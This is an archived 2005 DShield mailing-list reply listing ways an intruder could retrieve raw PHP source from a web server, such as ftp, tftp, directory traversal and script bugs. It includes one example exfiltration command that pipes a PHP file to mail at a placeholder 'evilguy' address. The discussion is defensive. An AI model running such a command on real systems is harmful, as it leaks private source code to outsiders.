[Dshield] PHP Security and Privacy

Valdis.Kletnieks@vt.edu Valdis.Kletnieks at vt.edu
Thu Dec 1 04:28:50 GMT 2005


On Wed, 30 Nov 2005 16:52:55 EST, David Cary Hart said:

> Other than rsync (which I have fully secured) are there any applications
> that would allow someone to fetch raw php source code in contrast to
> rendered html content?

ssh/scp/sftp.

ftp.

tftp (it's amazing how many sites get this wrong).

If they can run commands, they can always 'cat script.php | mail evilguy at aol.com'.

Directory traversal attacks on PHP or other cgi (or unsecured Apache configs).

Other security bugs in PHP scripts, allowing them to run commands, then see
the 'cat | mail' scenario.

Should I go on?
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://www.dshield.org/pipermail/list/attachments/20051130/138c0225/attachment.bin


More information about the list mailing list